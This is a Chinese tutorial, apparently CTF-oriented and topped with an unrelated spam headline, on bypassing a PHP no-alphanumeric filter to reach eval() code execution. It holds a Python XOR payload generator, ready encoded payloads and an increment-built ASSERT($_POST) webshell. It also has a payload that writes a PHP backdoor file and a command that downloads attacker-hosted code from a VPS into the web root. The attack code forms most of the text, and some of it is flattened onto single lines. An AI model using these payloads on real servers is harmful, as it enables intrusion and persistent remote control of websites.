php网站建设网站郑州做网站公司排名

无数字字母RCE，这是一个老生常谈的问题，就是不利用数字和字母构造出webshell，从而能够执行我们的命令。

<?php
highlight_file(__FILE__);
$code = $_GET['code'];
if(preg_match("/[A-Za-z0-9]+/",$code)){die("hacker!");
}
@eval($code);
?>

例如这样的过滤，就要利用各种非字母数字的字符，通过各种变换如异或、取反、自增等方法构造出单个的字母字符，然后将这些构造出的字符拼接成一个函数名，然后就可以达成RCE

异或^

这里的异或，指的是php按位异或，在php中，两个字符进行异或操作后，得到的依然是一个字符，所以说当我们想得到a-z中某个字母时，就可以找到两个非字母数字的字符，只要他们俩的异或结果是这个字母即可。而在php中，两个字符进行异或时，会先将字符串转换成ascii码值，再将这个值转换成二进制，然后一位一位的进行按位异或，异或的规则是：1^1=0,1^0=1,0^1=1,0^0=0，简单的来说就是相同为零，不同为一

具体参考这个表格：

假如说我们想要构造出小写字母a，按照上表，a的二进制为01100001，那我们就可以选择两个非字母数字的字符进行异或，这里有很多种选法，我选择的是@和!这两个，就能成功异或出字母a

import re
import urllib.parse
import requestsdef generate_xor_expression(payload, filter_regex):"""根据目标 payload 和过滤正则表达式，生成异或表达式。参数:payload: 目标字符串filter_regex: 用于过滤字符的正则表达式返回:构造的异或表达式字符串"""xor_1 = ''xor_2 = ''usable_chars = []# 找到没有被过滤的可用字符for i in range(0xff):if chr(i) not in filter_regex:usable_chars.append(chr(i))# 遍历目标 payload 的每个字符，找到对应的异或字符对for k in range(len(payload)):for i in usable_chars:if chr(ord(i) ^ 127) == payload[k]:  # 检查两个字符异或结果是否等于目标字符xor_1 += ixor_2 += chr(127)continue# 构建最终的表达式，将字符进行URL编码return "('" + urllib.parse.quote(xor_1) + "'^'" + urllib.parse.quote(xor_2) + "')"# 测试函数
if __name__ == "__main__":payload = "eval($_POST[1]);"  # 要生成的目标 payloadfilter_regex = r'[a-zA-Z0-9]'  # 定义过滤正则表达式result = generate_xor_expression(payload, filter_regex)  # 调用函数print(result)  # 打印最终生成的表达式

这是一个简单的异或构造的脚本，可以生成payload

取反~

<?php 
$a=urlencode(~'assert');
echo $a;
echo '666';
$b=urlencode(~'eval($_POST[1]);');
echo $b;

就像这样，得到结果为：

(~%9E%8C%8C%9A%8D%8B)(~%9A%89%9E%93%D7%DB%A0%AF%B0%AC%AB%A4%CE%A2%D6%C4);

自增

利用自增，例如

"a"++ => "b"

所以，只要能够得到一个字符，我们就可以通过自增或自减的方式得到所有的字母。那么，要如何得到一个字母，例如A，在PHP中，强制连接数组和字符串的话，数组将会被转化为字符串，其值为“Array”。再取这个字符串的第一个字母，就可以得到A。

大佬的payload：

<?php
$_=[].'';   //得到"Array"
$___ = $_[$__];   //得到"A"，$__没有定义，默认为False也即0，此时$___="A"
$__ = $___;   //$__="A"
$_ = $___;   //$_="A"
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;   //得到"S"，此时$__="S"
$___ .= $__;   //$___="AS"
$___ .= $__;   //$___="ASS"
$__ = $_;   //$__="A"
$__++;$__++;$__++;$__++;   //得到"E"，此时$__="E"
$___ .= $__;   //$___="ASSE"
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__;$__++;   //得到"R"，此时$__="R"
$___ .= $__;   //$___="ASSER"
$__++;$__++;   //得到"T"，此时$__="T"
$___ .= $__;   //$___="ASSERT"
$__ = $_;   //$__="A"
$____ = "_";   //$____="_"
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;   //得到"P"，此时$__="P"
$____ .= $__;   //$____="_P"
$__ = $_;   //$__="A"
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;   //得到"O"，此时$__="O"
$____ .= $__;   //$____="_PO"
$__++;$__++;$__++;$__++;   //得到"S"，此时$__="S"
$____ .= $__;   //$____="_POS"
$__++;   //得到"T"，此时$__="T"
$____ .= $__;   //$____="_POST"
$_ = $$____;   //$_=$_POST
$___($_[_]);   //ASSERT($POST[_])

PHP7和PHP5中的特性

assert是无字母数字RCE中很重要的一个函数，但是php5和php7中的这个函数是有区别的。在php5中，assert是一个函数，因此我们可以动态调用。但是在PHP7中，assert不再是一个函数，而是变成了一个语言结构，不能再作为函数名动态执行代码。在php7中，可以通过($a)()这样的方式来执行命令，也就是说我们对phpinfo取反之后就可以直接执行了，亦或用file_put_contents来写shell。

例如php7中想执行phpinfo()，可以写成(phpinfo)()，利用取反构造payload：

(~%8F%97%8F%96%91%99%90)() // phpinfo

同理也可以直接写马

file_put_contents('4.php','<?php eval(\$_POST[1]);');
(~(%99%96%93%9A%A0%8F%8A%8B%A0%9C%90%91%8B%9A%91%8B%8C))(~(%CB%D1%8F%97%8F),~(%C3%C0%8F%97%8F%DF%9A%89%9E%93%D7%DB%A0%AF%B0%AC%AB%A4%CE%A2%D6%C4));

在php5中，不支持用($a)()这样的语句来调用函数，但是在php5中assert是一个函数，我们可以通过$f='assert';$f(...);这样的方法来动态执行任意代码

无字母数字webshell之提高篇 | 离别歌这里面有，等我仔细攻读一下

临时文件

临时文件目录：

Linux临时文件主要存储在/tmp/目录下，格式通常是（/tmp/php[6个随机字符]）

Windows临时文件主要存储在C:/Windows/目录下，格式通常是（C:/Windows/php[4个随机字符].tmp）

大概就是在自己的vps上写一个命令执行的txt，然后在题目post该命令

curl http://your_vps/1.txt > /var/www/html/1.php

然后 ?cmd=?><?=`/??p/p?p??????`;

为什么可以这样执行呢？因为在linux里，如果一个文件里有命令，是可以通过这个文件名执行命令的，这里我们相当于使用临时文件执行了命令